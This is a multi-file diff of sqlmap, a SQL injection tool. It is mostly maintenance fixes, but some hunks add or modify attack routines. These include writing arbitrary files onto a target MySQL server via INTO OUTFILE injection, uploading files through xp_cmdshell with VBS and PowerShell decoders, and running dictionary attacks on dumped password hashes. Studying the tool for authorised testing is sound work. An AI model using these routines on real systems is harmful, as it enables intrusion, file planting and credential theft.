@@ -101,7 +101,7 @@ def checkDependencies():
warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "be able to take advantage of the sqlmap TAB "
warnMsg += "completion and history support features in the SQL " warnMsg += "completion and history support features in the SQL "
warnMsg += "shell and OS shell. Download from " warnMsg += "shell and OS shell. Download from "
warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" warnMsg += "'https://pypi.org/project/pyreadline/'"
logger.warn(warnMsg) logger.warn(warnMsg)
missing_libraries.add('python-pyreadline') missing_libraries.add('python-pyreadline')

View File

@@ -7,7 +7,7 @@ See the file 'LICENSE' for copying permission
try:
from crypt import crypt
- except ImportError:
+ except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171
from thirdparty.fcrypt.fcrypt import crypt
_multiprocessing = None
@@ -75,6 +75,7 @@ from lib.core.settings import COMMON_PASSWORD_SUFFIXES
from lib.core.settings import COMMON_USER_COLUMNS
from lib.core.settings import DEV_EMAIL_ADDRESS
from lib.core.settings import DUMMY_USER_PREFIX
from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER
from lib.core.settings import HASH_MOD_ITEM_DISPLAY
from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
from lib.core.settings import IS_WIN
@@ -684,7 +685,7 @@ def attackDumpedTable():
value = table[column]['values'][i]
if value and value.lower() in lut:
- table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()]))
+ table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER))
table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
def hashRecognition(value):
@@ -903,7 +904,7 @@ def dictionaryAttack(attack_dict):
if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64):
item = [(user, hash_.decode("base64").encode("hex")), {}]
- elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1):
+ elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1):
item = [(user, hash_), {}]
elif hash_regex in (HASH.SSHA,):
item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}]

View File

@@ -11,6 +11,7 @@ from extra.safe2bin.safe2bin import safechardecode
from lib.core.agent import agent
from lib.core.bigarray import BigArray
from lib.core.common import Backend
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
@@ -31,7 +32,7 @@ from lib.core.settings import NULL
from lib.core.unescaper import unescaper
from lib.request import inject
- def pivotDumpTable(table, colList, count=None, blind=True):
+ def pivotDumpTable(table, colList, count=None, blind=True, alias=None):
lengths = {}
entries = {}
@@ -88,7 +89,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
if not validPivotValue:
for column in colList:
infoMsg = "fetching number of distinct "
- infoMsg += "values for column '%s'" % column
+ infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "")
logger.info(infoMsg)
query = dumpNode.count2 % (column, table)
@@ -99,7 +100,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
validColumnList = True
if value == count:
- infoMsg = "using column '%s' as a pivot " % column
+ infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "")
infoMsg += "for retrieving row data"
logger.info(infoMsg)
@@ -174,10 +175,10 @@ def pivotDumpTable(table, colList, count=None, blind=True):
warnMsg += "will display partial output" warnMsg += "will display partial output"
logger.warn(warnMsg) logger.warn(warnMsg)
except SqlmapConnectionException, e: except SqlmapConnectionException, ex:
errMsg = "connection exception detected. sqlmap " errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex)
errMsg += "will display partial output" errMsg += "will display partial output"
errMsg += "'%s'" % e
logger.critical(errMsg) logger.critical(errMsg)
return entries, lengths return entries, lengths

View File

@@ -5,6 +5,8 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import time
from lib.core.common import getUnicode
from lib.core.common import dataToStdout
from lib.core.data import conf
@@ -17,13 +19,12 @@ class ProgressBar(object):
def __init__(self, minValue=0, maxValue=10, totalWidth=None):
self._progBar = "[]"
self._oldProgBar = ""
self._min = int(minValue)
self._max = int(maxValue)
self._span = max(self._max - self._min, 0.001)
self._width = totalWidth if totalWidth else conf.progressWidth
self._amount = 0
- self._times = []
+ self._start = None
self.update()
def _convertSeconds(self, value):
@@ -52,7 +53,7 @@ class ProgressBar(object):
percentDone = min(100, int(percentDone))
# Figure out how many hash bars the percentage should be
- allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max))
+ allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max))
numHashes = (percentDone / 100.0) * allFull
numHashes = int(round(numHashes))
@@ -68,19 +69,18 @@ class ProgressBar(object):
percentString = getUnicode(percentDone) + "%" percentString = getUnicode(percentDone) + "%"
self._progBar = "%s %s" % (percentString, self._progBar) self._progBar = "%s %s" % (percentString, self._progBar)
def progress(self, deltaTime, newAmount): def progress(self, newAmount):
""" """
This method saves item delta time and shows updated progress bar with calculated eta This method saves item delta time and shows updated progress bar with calculated eta
""" """
- if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max:
+ if self._start is None or newAmount > self._max:
+ self._start = time.time()
eta = None
else:
- midTime = sum(self._times) / len(self._times)
- midTimeWithLatest = (midTime + deltaTime) / 2
- eta = midTimeWithLatest * (self._max - newAmount)
- self._times.append(deltaTime)
+ delta = time.time() - self._start
+ eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta
self.update(newAmount)
self.draw(eta)
@@ -89,15 +89,13 @@ class ProgressBar(object):
This method draws the progress bar if it has changed
"""
- if self._progBar != self._oldProgBar:
- self._oldProgBar = self._progBar
- dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else ""))
- if self._amount >= self._max:
- if not conf.liveTest:
- dataToStdout("\r%s\r" % (" " * self._width))
- kb.prependFlag = False
- else:
- dataToStdout("\n")
+ dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??"))))
+ if self._amount >= self._max:
+ if not conf.liveTest:
+ dataToStdout("\r%s\r" % (" " * self._width))
+ kb.prependFlag = False
+ else:
+ dataToStdout("\n")
def __str__(self):
"""

View File

@@ -6,18 +6,23 @@ See the file 'LICENSE' for copying permission
""" """
import sys import sys
import time
PYVERSION = sys.version.split()[0] PYVERSION = sys.version.split()[0]
if PYVERSION >= "3" or PYVERSION < "2.6": if PYVERSION >= "3" or PYVERSION < "2.6":
exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION))
errors = []
extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib")
try: for _ in extensions:
for _ in extensions: try:
__import__(_) __import__(_)
except ImportError: except ImportError:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errors.append(_)
if errors:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in errors))
errMsg += "most likely because current version of Python has been " errMsg += "most likely because current version of Python has been "
errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" errMsg += "built without appropriate dev packages"
exit(errMsg) exit(errMsg)
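Distilled standalone version of the per-extension check introduced above: each core module is imported on its own, so every missing extension is named instead of the first failure aborting the whole loop.

missing = []
for name in ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib"):
    try:
        __import__(name)
    except ImportError:
        missing.append(name)

if missing:
    exit("missing core extension(s): %s" % ", ".join("'%s'" % name for name in missing))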

View File

@@ -129,7 +129,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"
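The recurring change from kb.bannerFp["dbmsVersion"] to kb.bannerFp.get("dbmsVersion") across the fingerprint modules swaps a potential KeyError for a plain None when banner parsing produced no version, e.g.:

bannerFp = {}                            # hypothetical empty banner fingerprint
banVer = bannerFp.get("dbmsVersion")     # None, no KeyError raised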

View File

@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -50,7 +50,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -44,7 +44,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -43,9 +43,8 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
rootQuery = queries[DBMS.MAXDB].dbs rootQuery = queries[DBMS.MAXDB].dbs
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True)
if retVal: if retVal:
kb.data.cachedDbs = retVal[0].values()[0] kb.data.cachedDbs = retVal[0].values()[0]
@@ -79,9 +78,8 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.MAXDB].tables rootQuery = queries[DBMS.MAXDB].tables
for db in dbs: for db in dbs:
randStr = randomStr()
query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER')
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=True)
if retVal: if retVal:
for table in retVal[0].values()[0]: for table in retVal[0].values()[0]:
@@ -193,7 +191,7 @@ class Enumeration(GenericEnumeration):
if dumpMode and colList: if dumpMode and colList:
table = {} table = {}
table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
continue continue
@@ -202,15 +200,14 @@ class Enumeration(GenericEnumeration):
infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
randStr = randomStr()
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER')
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=True)
if retVal: if retVal:
table = {} table = {}
columns = {} columns = {}
for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): for columnname, datatype, length in zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]):
columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length)
table[tbl] = columns table[tbl] = columns
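Replacing the per-call randomStr() alias with the session-wide kb.aliasName keeps the pivot query text identical between runs, which is what lets already retrieved rows be picked up again from the session data. Illustrative sketch (the alias value and query below are made up for the example):

alias = "sqlmapalias"                             # fixed once per session, cf. kb.aliasName
query = "(SELECT schemaname FROM domain.schemas) AS %s" % alias
columns = ["%s.schemaname" % alias]               # same text on every run -> resumable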

View File

@@ -67,11 +67,11 @@ class Filesystem(GenericFilesystem):
chunkName = randomStr(lowercase=True) chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName) fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
@@ -174,10 +174,10 @@ class Filesystem(GenericFilesystem):
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
wFileSize = len(encodedFileContent) wFileSize = len(encodedFileContent)
chunkMaxSize = 1024 chunkMaxSize = 1024
@@ -212,15 +212,15 @@ class Filesystem(GenericFilesystem):
logger.info(infoMsg) logger.info(infoMsg)
dFileName = ntpath.basename(dFile) dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName) sFile = "%s\\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile) wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00 debugSize = 0xFF00
if wFileSize < debugSize: if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath) chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
@@ -248,7 +248,7 @@ class Filesystem(GenericFilesystem):
debugMsg = "appending chunk " debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
@@ -275,7 +275,7 @@ class Filesystem(GenericFilesystem):
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s" inputFilePath = "%s"
@@ -338,7 +338,7 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
@@ -359,7 +359,7 @@ class Filesystem(GenericFilesystem):
chunkMaxSize = 500 chunkMaxSize = 500
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile)
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)
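The '\%s' to '\\%s' changes above do not alter runtime behaviour, because '\%' is not a recognized Python escape and the single backslash was already kept literally; the doubled form simply makes the intent explicit and avoids invalid-escape warnings on newer interpreters. For instance:

# both literals yield exactly the same string
assert "%s\%s" % ("C:\\WINDOWS\\Temp", "file.txt") == "%s\\%s" % ("C:\\WINDOWS\\Temp", "file.txt")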

View File

@@ -46,9 +46,9 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None release = kb.bannerFp.get("dbmsRelease")
version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None version = kb.bannerFp.get("dbmsVersion")
servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None servicepack = kb.bannerFp.get("dbmsServicePack")
if release and version and servicepack: if release and version and servicepack:
banVer = "%s %s " % (DBMS.MSSQL, release) banVer = "%s %s " % (DBMS.MSSQL, release)

View File

@@ -37,7 +37,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
except (pymysql.OperationalError, pymysql.InternalError), msg: except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg:
raise SqlmapConnectionException(msg[1]) raise SqlmapConnectionException(msg[1])
except struct.error, msg: except struct.error, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)

View File

@@ -5,6 +5,8 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.agent import agent
from lib.core.common import getSQLSnippet
from lib.core.common import isNumPosStrValue from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable from lib.core.common import isTechniqueAvailable
from lib.core.common import popValue from lib.core.common import popValue
@@ -16,11 +18,13 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.decorators import stackedmethod from lib.core.decorators import stackedmethod
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.union.use import unionUse from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
@@ -112,6 +116,34 @@ class Filesystem(GenericFilesystem):
return self.askCheckWrittenFile(wFile, dFile, forceCheck) return self.askCheckWrittenFile(wFile, dFile, forceCheck)
def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr)
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
warnMsg += "bytes, this might cause errors in the file "
warnMsg += "writing process"
logger.warn(warnMsg)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
logger.debug(debugMsg)
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg)
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
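Rough sketch of the payload shape the new linesTerminatedWriteFile() relies on (simplified; the real text comes from the 'write_file_limit' snippet whose template appears in a later hunk of this diff): the original query is restricted to a single row and redirected INTO OUTFILE, with the hex-encoded file content smuggled in as the line terminator.

from binascii import hexlify

def lines_terminated_fragment(outfile, content):
    # content: raw bytes that should end up in 'outfile' on the DBMS host
    return " LIMIT 0,1 INTO OUTFILE '%s' LINES TERMINATED BY 0x%s-- -" % (outfile, hexlify(content).decode())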
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
debugMsg = "creating a support table to write the hexadecimal " debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to" debugMsg += "encoded file to"
@@ -130,6 +162,8 @@ class Filesystem(GenericFilesystem):
logger.debug("inserting the hexadecimal encoded file to the support table") logger.debug("inserting the hexadecimal encoded file to the support table")
inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)

View File

@@ -48,11 +48,11 @@ class Fingerprint(GenericFingerprint):
(50000, 50096), # MySQL 5.0 (50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1 (50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4 (50400, 50404), # MySQL 5.4
(50500, 50558), # MySQL 5.5 (50500, 50564), # MySQL 5.5
(50600, 50638), # MySQL 5.6 (50600, 50644), # MySQL 5.6
(50700, 50720), # MySQL 5.7 (50700, 50726), # MySQL 5.7
(60000, 60014), # MySQL 6.0 (60000, 60014), # MySQL 6.0
(80000, 80003), # MySQL 8.0 (80000, 80015), # MySQL 8.0
) )
index = -1 index = -1
@@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint):
value += "\n%scomment injection fingerprint: %s" % (blank, comVer) value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
if banVer and re.search(r"-log$", kb.data.banner): if banVer and re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"
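The widened (start, end) pairs above are the candidate ranges probed during MySQL comment-injection fingerprinting; a versioned comment is only executed by servers at or above the embedded version number. Illustrative helper (not sqlmap's API):

def versioned_payload(version, expression="AND 1=1"):
    # e.g. versioned_payload(50726) -> "/*!50726 AND 1=1*/",
    # which only a MySQL server >= 5.7.26 actually evaluates
    return "/*!%d %s*/" % (version, expression)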

View File

@@ -46,7 +46,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -45,7 +45,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
@@ -100,9 +100,9 @@ class Fingerprint(GenericFingerprint):
if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
Backend.setVersion(">= 10.0") Backend.setVersion(">= 10.0")
elif inject.checkBooleanExpression("SIND(0)=0"): elif inject.checkBooleanExpression("SIND(0)=0"):
Backend.setVersion(">= 9.6.0", "< 10.0") Backend.setVersionList([">= 9.6.0", "< 10.0"])
elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.5.0", "< 9.6.0") Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
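The boolean probes above pin down the PostgreSQL version by testing functions that only exist from a given release, newest first; setVersionList records a bounded range when no exact version can be determined. Condensed illustration of the ordering (data only, not sqlmap code):

PROBES = (
    ("XMLTABLE(NULL) IS NULL", [">= 10.0"]),
    ("SIND(0)=0", [">= 9.6.0", "< 10.0"]),
    ("TO_JSONB(1) IS NOT NULL", [">= 9.5.0", "< 9.6.0"]),
    ("JSON_TYPEOF(NULL) IS NULL", [">= 9.4.0", "< 9.5.0"]),
)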

View File

@@ -45,7 +45,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -38,7 +38,6 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.SYBASE].users rootQuery = queries[DBMS.SYBASE].users
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
